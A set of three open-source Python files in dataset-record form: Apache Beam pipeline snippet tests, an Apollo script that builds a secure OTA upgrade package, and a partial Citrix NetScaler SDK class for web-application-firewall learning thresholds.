class DummyWriteTransform(beam.PTransform):
"""A transform that will replace iobase.WriteToText.
To be used for testing.
"""
def __init__(self, file_to_write=None, file_name_suffix=''):
self.file_to_write = file_to_write
class WriteDoFn(beam.DoFn):
def __init__(self, file_to_write):
self.file_to_write = file_to_write
self.file_obj = None
self.coder = coders.ToStringCoder()
def start_bundle(self):
assert self.file_to_write
self.file_to_write += str(uuid.uuid4())
self.file_obj = open(self.file_to_write, 'w')
def process(self, element):
assert self.file_obj
self.file_obj.write(self.coder.encode(element) + '\n')
def finish_bundle(self):
assert self.file_obj
self.file_obj.close()
def expand(self, pcoll):
return pcoll | 'DummyWriteForTesting' >> beam.ParDo(
SnippetsTest.DummyWriteTransform.WriteDoFn(self.file_to_write))
def setUp(self):
self.old_read_from_text = beam.io.ReadFromText
self.old_write_to_text = beam.io.WriteToText
# Monkey patching to allow testing pipelines defined in snippets.py using
# real data.
beam.io.ReadFromText = SnippetsTest.DummyReadTransform
beam.io.WriteToText = SnippetsTest.DummyWriteTransform
self.temp_files = []
def tearDown(self):
beam.io.ReadFromText = self.old_read_from_text
beam.io.WriteToText = self.old_write_to_text
# Cleanup all the temporary files created in the test
map(os.remove, self.temp_files)
def create_temp_file(self, contents=''):
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(contents)
self.temp_files.append(f.name)
return f.name
def get_output(self, path, sorted_output=True, suffix=''):
all_lines = []
for file_name in glob.glob(path + '*'):
with open(file_name) as f:
lines = f.readlines()
all_lines.extend([s.rstrip('\n') for s in lines])
if sorted_output:
return sorted(s.rstrip('\n') for s in all_lines)
else:
return all_lines
def test_model_pipelines(self):
temp_path = self.create_temp_file('aa bb cc\n bb cc\n cc')
result_path = temp_path + '.result'
snippets.model_pipelines([
'--input=%s*' % temp_path,
'--output=%s' % result_path])
self.assertEqual(
self.get_output(result_path),
[str(s) for s in [(u'aa', 1), (u'bb', 2), (u'cc', 3)]])
def test_model_pcollection(self):
temp_path = self.create_temp_file()
snippets.model_pcollection(['--output=%s' % temp_path])
self.assertEqual(self.get_output(temp_path, sorted_output=False), [
'To be, or not to be: that is the question: ',
'Whether \'tis nobler in the mind to suffer ',
'The slings and arrows of outrageous fortune, ',
'Or to take arms against a sea of troubles, '])
def test_construct_pipeline(self):
temp_path = self.create_temp_file(
'abc def ghi\n jkl mno pqr\n stu vwx yz')
result_path = self.create_temp_file()
snippets.construct_pipeline({'read': temp_path, 'write': result_path})
self.assertEqual(
self.get_output(result_path),
['cba', 'fed', 'ihg', 'lkj', 'onm', 'rqp', 'uts', 'xwv', 'zy'])
def test_model_custom_source(self):
snippets.model_custom_source(100)
def test_model_custom_sink(self):
tempdir_name = tempfile.mkdtemp()
class SimpleKV(object):
def __init__(self, tmp_dir):
self._dummy_token = 'dummy_token'
self._tmp_dir = tmp_dir
def connect(self, url):
return self._dummy_token
def open_table(self, access_token, table_name):
assert access_token == self._dummy_token
file_name = self._tmp_dir + os.sep + table_name
assert not os.path.exists(file_name)
open(file_name, 'wb').close()
return table_name
def write_to_table(self, access_token, table_name, key, value):
assert access_token == self._dummy_token
file_name = self._tmp_dir + os.sep + table_name
assert os.path.exists(file_name)
with open(file_name, 'ab') as f:
f.write(key + ':' + value + os.linesep)
def rename_table(self, access_token, old_name, new_name):
assert access_token == self._dummy_token
old_file_name = self._tmp_dir + os.sep + old_name
new_file_name = self._tmp_dir + os.sep + new_name
assert os.path.isfile(old_file_name)
assert not os.path.exists(new_file_name)
os.rename(old_file_name, new_file_name)
snippets.model_custom_sink(
SimpleKV(tempdir_name),
[('key' + str(i), 'value' + str(i)) for i in range(100)],
'final_table_no_ptransform', 'final_table_with_ptransform')
expected_output = [
'key' + str(i) + ':' + 'value' + str(i) for i in range(100)]
glob_pattern = tempdir_name + os.sep + 'final_table_no_ptransform*'
output_files = glob.glob(glob_pattern)
assert output_files
received_output = []
for file_name in output_files:
with open(file_name) as f:
for line in f:
received_output.append(line.rstrip(os.linesep))
self.assertItemsEqual(expected_output, received_output)
glob_pattern = tempdir_name + os.sep + 'final_table_with_ptransform*'
output_files = glob.glob(glob_pattern)
assert output_files
received_output = []
for file_name in output_files:
with open(file_name) as f:
for line in f:
received_output.append(line.rstrip(os.linesep))
self.assertItemsEqual(expected_output, received_output)
def test_model_textio(self):
temp_path = self.create_temp_file('aa bb cc\n bb cc\n cc')
result_path = temp_path + '.result'
snippets.model_textio({'read': temp_path, 'write': result_path})
self.assertEqual(
['aa', 'bb', 'bb', 'cc', 'cc', 'cc'],
self.get_output(result_path, suffix='.csv'))
def test_model_textio_compressed(self):
temp_path = self.create_temp_file('aa\nbb\ncc')
gzip_file_name = temp_path + '.gz'
with open(temp_path) as src, gzip.open(gzip_file_name, 'wb') as dst:
dst.writelines(src)
# Add the temporary gzip file to be cleaned up as well.
self.temp_files.append(gzip_file_name)
snippets.model_textio_compressed(
{'read': gzip_file_name}, ['aa', 'bb', 'cc'])
@unittest.skipIf(datastore_pb2 is None, 'GCP dependencies are not installed')
def test_model_datastoreio(self):
# We cannot test datastoreio functionality in unit tests therefore we limit
# ourselves to making sure the pipeline containing Datastore read and write
# transforms can be built.
# TODO(vikasrk): Expore using Datastore Emulator.
snippets.model_datastoreio()
@unittest.skipIf(base_api is None, 'GCP dependencies are not installed')
def test_model_bigqueryio(self):
# We cannot test BigQueryIO functionality in unit tests therefore we limit
# ourselves to making sure the pipeline containing BigQuery sources and
# sinks can be built.
snippets.model_bigqueryio()
def _run_test_pipeline_for_options(self, fn):
temp_path = self.create_temp_file('aa\nbb\ncc')
result_path = temp_path + '.result'
fn([
'--input=%s*' % temp_path,
'--output=%s' % result_path])
self.assertEqual(
['aa', 'bb', 'cc'],
self.get_output(result_path))
def test_pipeline_options_local(self):
self._run_test_pipeline_for_options(snippets.pipeline_options_local)
def test_pipeline_options_remote(self):
self._run_test_pipeline_for_options(snippets.pipeline_options_remote)
def test_pipeline_options_command_line(self):
self._run_test_pipeline_for_options(snippets.pipeline_options_command_line)
def test_pipeline_logging(self):
result_path = self.create_temp_file()
lines = ['we found love right where we are',
'we found love right from the start',
'we found love in a hopeless place']
snippets.pipeline_logging(lines, result_path)
self.assertEqual(
sorted(' '.join(lines).split(' ')),
self.get_output(result_path))
def test_examples_wordcount(self):
pipelines = [snippets.examples_wordcount_minimal,
snippets.examples_wordcount_wordcount,
snippets.pipeline_monitoring]
for pipeline in pipelines:
temp_path = self.create_temp_file(
'abc def ghi\n abc jkl')
result_path = self.create_temp_file()
pipeline({'read': temp_path, 'write': result_path})
self.assertEqual(
self.get_output(result_path),
['abc: 2', 'def: 1', 'ghi: 1', 'jkl: 1'])
def test_examples_wordcount_debugging(self):
temp_path = self.create_temp_file(
'Flourish Flourish Flourish stomach abc def')
result_path = self.create_temp_file()
snippets.examples_wordcount_debugging(
{'read': temp_path, 'write': result_path})
self.assertEqual(
self.get_output(result_path),
['Flourish: 3', 'stomach: 1'])
def test_model_composite_transform_example(self):
contents = ['aa bb cc', 'bb cc', 'cc']
result_path = self.create_temp_file()
snippets.model_composite_transform_example(contents, result_path)
self.assertEqual(['aa: 1', 'bb: 2', 'cc: 3'], self.get_output(result_path))
def test_model_multiple_pcollections_flatten(self):
contents = ['a', 'b', 'c', 'd', 'e', 'f']
result_path = self.create_temp_file()
snippets.model_multiple_pcollections_flatten(contents, result_path)
self.assertEqual(contents, self.get_output(result_path))
def test_model_multiple_pcollections_partition(self):
contents = [17, 42, 64, 32, 0, 99, 53, 89]
result_path = self.create_temp_file()
snippets.model_multiple_pcollections_partition(contents, result_path)
self.assertEqual(['0', '17', '32', '42', '53', '64', '89', '99'],
self.get_output(result_path))
def test_model_group_by_key(self):
contents = ['a bb ccc bb bb a']
result_path = self.create_temp_file()
snippets.model_group_by_key(contents, result_path)
expected = [('a', 2), ('bb', 3), ('ccc', 1)]
self.assertEqual([str(s) for s in expected], self.get_output(result_path))
def test_model_co_group_by_key_tuple(self):
email_list = [['a', 'a@example.com'], ['b', 'b@example.com']]
phone_list = [['a', 'x4312'], ['b', 'x8452']]
result_path = self.create_temp_file()
snippets.model_co_group_by_key_tuple(email_list, phone_list, result_path)
expect = ['a; a@example.com; x4312', 'b; b@example.com; x8452']
self.assertEqual(expect, self.get_output(result_path))
def test_model_join_using_side_inputs(self):
name_list = ['a', 'b']
email_list = [['a', 'a@example.com'], ['b', 'b@example.com']]
phone_list = [['a', 'x4312'], ['b', 'x8452']]
result_path = self.create_temp_file()
snippets.model_join_using_side_inputs(
name_list, email_list, phone_list, result_path)
expect = ['a; a@example.com; x4312', 'b; b@example.com; x8452']
self.assertEqual(expect, self.get_output(result_path))
class CombineTest(unittest.TestCase):
"""Tests for model/combine."""
def test_global_sum(self):
pc = [1, 2, 3]
# [START global_sum]
result = pc | beam.CombineGlobally(sum)
# [END global_sum]
self.assertEqual([6], result)
def test_combine_values(self):
occurences = [('cat', 1), ('cat', 5), ('cat', 9), ('dog', 5), ('dog', 2)]
# [START combine_values]
first_occurences = occurences | beam.GroupByKey() | beam.CombineValues(min)
# [END combine_values]
self.assertEqual({('cat', 1), ('dog', 2)}, set(first_occurences))
def test_combine_per_key(self):
player_accuracies = [
('cat', 1), ('cat', 5), ('cat', 9), ('cat', 1),
('dog', 5), ('dog', 2)]
# [START combine_per_key]
avg_accuracy_per_player = (player_accuracies
| beam.CombinePerKey(
beam.combiners.MeanCombineFn()))
# [END combine_per_key]
self.assertEqual({('cat', 4.0), ('dog', 3.5)}, set(avg_accuracy_per_player))
def test_combine_concat(self):
pc = ['a', 'b']
# [START combine_concat]
def concat(values, separator=', '):
return separator.join(values)
with_commas = pc | beam.CombineGlobally(concat)
with_dashes = pc | beam.CombineGlobally(concat, separator='-')
# [END combine_concat]
self.assertEqual(1, len(with_commas))
self.assertTrue(with_commas[0] in {'a, b', 'b, a'})
self.assertEqual(1, len(with_dashes))
self.assertTrue(with_dashes[0] in {'a-b', 'b-a'})
def test_bounded_sum(self):
# [START combine_bounded_sum]
pc = [1, 10, 100, 1000]
def bounded_sum(values, bound=500):
return min(sum(values), bound)
small_sum = pc | beam.CombineGlobally(bounded_sum) # [500]
large_sum = pc | beam.CombineGlobally(bounded_sum, bound=5000) # [1111]
# [END combine_bounded_sum]
self.assertEqual([500], small_sum)
self.assertEqual([1111], large_sum)
def test_combine_reduce(self):
factors = [2, 3, 5, 7]
# [START combine_reduce]
import functools
import operator
product = factors | beam.CombineGlobally(
functools.partial(reduce, operator.mul), 1)
# [END combine_reduce]
self.assertEqual([210], product)
def test_custom_average(self):
pc = [2, 3, 5, 7]
# [START combine_custom_average]
class AverageFn(beam.CombineFn):
def create_accumulator(self):
return (0.0, 0)
def add_input(self, (sum, count), input):
return sum + input, count + 1
def merge_accumulators(self, accumulators):
sums, counts = zip(*accumulators)
return sum(sums), sum(counts)
def extract_output(self, (sum, count)):
return sum / count if count else float('NaN')
average = pc | beam.CombineGlobally(AverageFn())
# [END combine_custom_average]
self.assertEqual([4.25], average)
def test_keys(self):
occurrences = [('cat', 1), ('cat', 5), ('dog', 5), ('cat', 9), ('dog', 2)]
unique_keys = occurrences | snippets.Keys()
self.assertEqual({'cat', 'dog'}, set(unique_keys))
def test_count(self):
occurrences = ['cat', 'dog', 'cat', 'cat', 'dog']
perkey_counts = occurrences | snippets.Count()
self.assertEqual({('cat', 3), ('dog', 2)}, set(perkey_counts))
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
|
jasonkuster/incubator-beam
|
sdks/python/apache_beam/examples/snippets/snippets_test.py
|
Python
|
apache-2.0
| 28,632
|
#!/usr/bin/env python3
###############################################################################
# Copyright 2017 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import secure_upgrade_export as sec_api
import os
import sys
sys.path.append('/home/caros/secure_upgrade/python')
root_config_path = "/home/caros/secure_upgrade/config/secure_config.json"
ret = sec_api.init_secure_upgrade(root_config_path)
if ret is True:
print('Security environment init successfully!')
else:
print('Security environment init failed!')
exit(1)
homedir = os.environ['HOME']
release_tgz = homedir + '/.cache/apollo_release.tar.gz'
sec_release_tgz = homedir + '/.cache/sec_apollo_release.tar.gz'
package_token = homedir + '/.cache/package_token'
ret = sec_api.sec_upgrade_get_package(
release_tgz, sec_release_tgz, package_token)
if ret is True:
print('Security package generated successfully!')
else:
print('Security package generated failed!')
|
ApolloAuto/apollo
|
modules/tools/ota/create_sec_package.py
|
Python
|
apache-2.0
| 1,573
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class appfwlearningsettings(base_resource) :
""" Configuration for learning settings resource. """
def __init__(self) :
self._profilename = ""
self._starturlminthreshold = 0
self._starturlpercentthreshold = 0
self._cookieconsistencyminthreshold = 0
self._cookieconsistencypercentthreshold = 0
self._csrftagminthreshold = 0
self._csrftagpercentthreshold = 0
self._fieldconsistencyminthreshold = 0
self._fieldconsistencypercentthreshold = 0
self._crosssitescriptingminthreshold = 0
self._crosssitescriptingpercentthreshold = 0
self._sqlinjectionminthreshold = 0
self._sqlinjectionpercentthreshold = 0
self._fieldformatminthreshold = 0
self._fieldformatpercentthreshold = 0
self._xmlwsiminthreshold = 0
self._xmlwsipercentthreshold = 0
self._xmlattachmentminthreshold = 0
self._xmlattachmentpercentthreshold = 0
self.___count = 0
@property
def profilename(self) :
ur"""Name of the profile.<br/>Minimum length = 1.
"""
try :
return self._profilename
except Exception as e:
raise e
@profilename.setter
def profilename(self, profilename) :
ur"""Name of the profile.<br/>Minimum length = 1
"""
try :
self._profilename = profilename
except Exception as e:
raise e
@property
def starturlminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn start URLs.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._starturlminthreshold
except Exception as e:
raise e
@starturlminthreshold.setter
def starturlminthreshold(self, starturlminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn start URLs.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._starturlminthreshold = starturlminthreshold
except Exception as e:
raise e
@property
def starturlpercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular start URL pattern for the learning engine to learn that start URL.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._starturlpercentthreshold
except Exception as e:
raise e
@starturlpercentthreshold.setter
def starturlpercentthreshold(self, starturlpercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular start URL pattern for the learning engine to learn that start URL.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._starturlpercentthreshold = starturlpercentthreshold
except Exception as e:
raise e
@property
def cookieconsistencyminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn cookies.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._cookieconsistencyminthreshold
except Exception as e:
raise e
@cookieconsistencyminthreshold.setter
def cookieconsistencyminthreshold(self, cookieconsistencyminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn cookies.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._cookieconsistencyminthreshold = cookieconsistencyminthreshold
except Exception as e:
raise e
@property
def cookieconsistencypercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular cookie pattern for the learning engine to learn that cookie.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._cookieconsistencypercentthreshold
except Exception as e:
raise e
@cookieconsistencypercentthreshold.setter
def cookieconsistencypercentthreshold(self, cookieconsistencypercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular cookie pattern for the learning engine to learn that cookie.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._cookieconsistencypercentthreshold = cookieconsistencypercentthreshold
except Exception as e:
raise e
@property
def csrftagminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn cross-site request forgery (CSRF) tags.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._csrftagminthreshold
except Exception as e:
raise e
@csrftagminthreshold.setter
def csrftagminthreshold(self, csrftagminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn cross-site request forgery (CSRF) tags.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._csrftagminthreshold = csrftagminthreshold
except Exception as e:
raise e
@property
def csrftagpercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular CSRF tag for the learning engine to learn that CSRF tag.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._csrftagpercentthreshold
except Exception as e:
raise e
@csrftagpercentthreshold.setter
def csrftagpercentthreshold(self, csrftagpercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular CSRF tag for the learning engine to learn that CSRF tag.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._csrftagpercentthreshold = csrftagpercentthreshold
except Exception as e:
raise e
@property
def fieldconsistencyminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn field consistency information.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._fieldconsistencyminthreshold
except Exception as e:
raise e
@fieldconsistencyminthreshold.setter
def fieldconsistencyminthreshold(self, fieldconsistencyminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn field consistency information.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._fieldconsistencyminthreshold = fieldconsistencyminthreshold
except Exception as e:
raise e
@property
def fieldconsistencypercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular field consistency pattern for the learning engine to learn that field consistency pattern.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._fieldconsistencypercentthreshold
except Exception as e:
raise e
@fieldconsistencypercentthreshold.setter
def fieldconsistencypercentthreshold(self, fieldconsistencypercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular field consistency pattern for the learning engine to learn that field consistency pattern.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._fieldconsistencypercentthreshold = fieldconsistencypercentthreshold
except Exception as e:
raise e
@property
def crosssitescriptingminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn HTML cross-site scripting patterns.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._crosssitescriptingminthreshold
except Exception as e:
raise e
@crosssitescriptingminthreshold.setter
def crosssitescriptingminthreshold(self, crosssitescriptingminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn HTML cross-site scripting patterns.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._crosssitescriptingminthreshold = crosssitescriptingminthreshold
except Exception as e:
raise e
@property
def crosssitescriptingpercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular cross-site scripting pattern for the learning engine to learn that cross-site scripting pattern.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._crosssitescriptingpercentthreshold
except Exception as e:
raise e
@crosssitescriptingpercentthreshold.setter
def crosssitescriptingpercentthreshold(self, crosssitescriptingpercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular cross-site scripting pattern for the learning engine to learn that cross-site scripting pattern.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._crosssitescriptingpercentthreshold = crosssitescriptingpercentthreshold
except Exception as e:
raise e
@property
def sqlinjectionminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn HTML SQL injection patterns.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._sqlinjectionminthreshold
except Exception as e:
raise e
@sqlinjectionminthreshold.setter
def sqlinjectionminthreshold(self, sqlinjectionminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn HTML SQL injection patterns.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._sqlinjectionminthreshold = sqlinjectionminthreshold
except Exception as e:
raise e
@property
def sqlinjectionpercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular HTML SQL injection pattern for the learning engine to learn that HTML SQL injection pattern.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._sqlinjectionpercentthreshold
except Exception as e:
raise e
@sqlinjectionpercentthreshold.setter
def sqlinjectionpercentthreshold(self, sqlinjectionpercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular HTML SQL injection pattern for the learning engine to learn that HTML SQL injection pattern.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._sqlinjectionpercentthreshold = sqlinjectionpercentthreshold
except Exception as e:
raise e
@property
def fieldformatminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn field formats.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._fieldformatminthreshold
except Exception as e:
raise e
@fieldformatminthreshold.setter
def fieldformatminthreshold(self, fieldformatminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn field formats.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._fieldformatminthreshold = fieldformatminthreshold
except Exception as e:
raise e
@property
def fieldformatpercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular web form field pattern for the learning engine to recommend a field format for that form field.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._fieldformatpercentthreshold
except Exception as e:
raise e
@fieldformatpercentthreshold.setter
def fieldformatpercentthreshold(self, fieldformatpercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular web form field pattern for the learning engine to recommend a field format for that form field.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._fieldformatpercentthreshold = fieldformatpercentthreshold
except Exception as e:
raise e
@property
def xmlwsiminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn web services interoperability (WSI) information.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._xmlwsiminthreshold
except Exception as e:
raise e
@xmlwsiminthreshold.setter
def xmlwsiminthreshold(self, xmlwsiminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn web services interoperability (WSI) information.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._xmlwsiminthreshold = xmlwsiminthreshold
except Exception as e:
raise e
@property
def xmlwsipercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular pattern for the learning engine to learn a web services interoperability (WSI) pattern.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._xmlwsipercentthreshold
except Exception as e:
raise e
@xmlwsipercentthreshold.setter
def xmlwsipercentthreshold(self, xmlwsipercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular pattern for the learning engine to learn a web services interoperability (WSI) pattern.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._xmlwsipercentthreshold = xmlwsipercentthreshold
except Exception as e:
raise e
@property
def xmlattachmentminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn XML attachment patterns.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._xmlattachmentminthreshold
except Exception as e:
raise e
@xmlattachmentminthreshold.setter
def xmlattachmentminthreshold(self, xmlattachmentminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn XML attachment patterns.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._xmlattachmentminthreshold = xmlattachmentminthreshold
except Exception as e:
raise e
@property
def xmlattachmentpercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular XML attachment pattern for the learning engine to learn that XML attachment pattern.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._xmlattachmentpercentthreshold
except Exception as e:
raise e
@xmlattachmentpercentthreshold.setter
def xmlattachmentpercentthreshold(self, xmlattachmentpercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular XML attachment pattern for the learning engine to learn that XML attachment pattern.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._xmlattachmentpercentthreshold = xmlattachmentpercentthreshold
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
ur""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(appfwlearningsettings_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.appfwlearningsettings
except Exception as e :
raise e
def _get_object_name(self) :
ur""" Returns the value of object identifier argument
"""
try :
if self.profilename is not None :
return str(self.profilename)
return None
except Exception as e :
raise e
@classmethod
def update(cls, client, resource) :
ur""" Use this API to update appfwlearningsettings.
"""
try :
if type(resource) is not list :
updateresource = appfwlearningsettings()
updateresource.profilename = resource.profilename
updateresource.starturlminthreshold = resource.starturlminthreshold
updateresource.starturlpercentthreshold = resource.starturlpercentthreshold
updateresource.cookieconsistencyminthreshold = resource.cookieconsistencyminthreshold
updateresource.cookieconsistencypercentthreshold = resource.cookieconsistencypercentthreshold
updateresource.csrftagminthreshold = resource.csrftagminthreshold
updateresource.csrftagpercentthreshold = resource.csrftagpercentthreshold
updateresource.fieldconsistencyminthreshold = resource.fieldconsistencyminthreshold
updateresource.fieldconsistencypercentthreshold = resource.fieldconsistencypercentthreshold
updateresource.crosssitescriptingminthreshold = resource.crosssitescriptingminthreshold
updateresource.crosssitescriptingpercentthreshold = resource.crosssitescriptingpercentthreshold
updateresource.sqlinjectionminthreshold = resource.sqlinjectionminthreshold
updateresource.sqlinjectionpercentthreshold = resource.sqlinjectionpercentthreshold
updateresource.fieldformatminthreshold = resource.fieldformatminthreshold
updateresource.fieldformatpercentthreshold = resource.fieldformatpercentthreshold
updateresource.xmlwsiminthreshold = resource.xmlwsiminthreshold
updateresource.xmlwsipercentthreshold = resource.xmlwsipercentthreshold
updateresource.xmlattachmentminthreshold = resource.xmlattachmentminthreshold
updateresource.xmlattachmentpercentthreshold = resource.xmlattachmentpercentthreshold
return updateresource.update_resource(client)
else :
if (resource and len(resource) > 0) :
updateresources = [ appfwlearningsettings() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].profilename = resource[i].profilename
updateresources[i].starturlminthreshold = resource[i].starturlminthreshold
updateresources[i].starturlpercentthreshold = resource[i].starturlpercentthreshold
updateresources[i].cookieconsistencyminthreshold = resource[i].cookieconsistencyminthreshold
updateresources[i].cookieconsistencypercentthreshold = resource[i].cookieconsistencypercentthreshold
updateresources[i].csrftagminthreshold = resource[i].csrftagminthreshold
updateresources[i].csrftagpercentthreshold = resource[i].csrftagpercentthreshold
updateresources[i].fieldconsistencyminthreshold = resource[i].fieldconsistencyminthreshold
updateresources[i].fieldconsistencypercentthreshold = resource[i].fieldconsistencypercentthreshold
updateresources[i].crosssitescriptingminthreshold = resource[i].crosssitescriptingminthreshold
updateresources[i].crosssitescriptingpercentthreshold = resource[i].crosssitescriptingpercentthreshold
updateresources[i].sqlinjectionminthreshold = resource[i].sqlinjectionminthreshold
updateresources[i].sqlinjectionpercentthreshold = resource[i].sqlinjectionpercentthreshold
updateresources[i].fieldformatminthreshold = resource[i].fieldformatminthreshold
updateresources[i].fieldformatpercentthreshold = resource[i].fieldformatpercentthreshold
updateresources[i].xmlwsiminthreshold = resource[i].xmlwsiminthreshold
updateresources[i].xmlwsipercentthreshold = resource[i].xmlwsipercentthreshold
updateresources[i].xmlattachmentminthreshold = resource[i].xmlattachmentminthreshold
updateresources[i].xmlattachmentpercentthreshold = resource[i].xmlattachmentpercentthreshold
result = cls.update_bulk_request(client, updateresources)
return result
except Exception as e :
raise e
@classmethod
def unset(cls, client, resource, args) :
ur""" Use this API to unset the properties of appfwlearningsettings resource.
Properties that need to be unset are specified in args array.
"""
try :
if type(resource) is not list :
unsetresource = appfwlearningsettings()
if type(resource) != type(unsetresource):
unsetresource.profilename = resource
else :
unsetresource.profilename = resource.profilename
return unsetresource.unset_resource(client, args)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
unsetresources = [ appfwlearningsettings() for _ in range(len(resource))]
for i in range(len(resource)) :
unsetresources[i].profilename = resource[i]
else :
if (resource and len(resource) > 0) :
unsetresources = [ appfwlearningsettings() for _ in range(len(resource))]
for i in range(len(resource)) :
unsetresources[i].profilename = resource[i].profilename
result = cls.unset_bulk_request(client, unsetresources, args)
return result
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
ur""" Use this API to fetch all the appfwlearningsettings resources that are configured on netscaler.
"""
try :
if not name :
obj = appfwlearningsettings()
response = obj.get_resources(client, option_)
else :
if type(name) != cls :
if type(name) is not list :
obj = appfwlearningsettings()
obj.profilename = name
response = obj.get_resource(client, option_)
else :
if name and len(name) > 0 :
response = [appfwlearningsettings() for _ in range(len(name))]
obj = [appfwlearningsettings() for _ in range(len(name))]
for i in range(len(name)) :
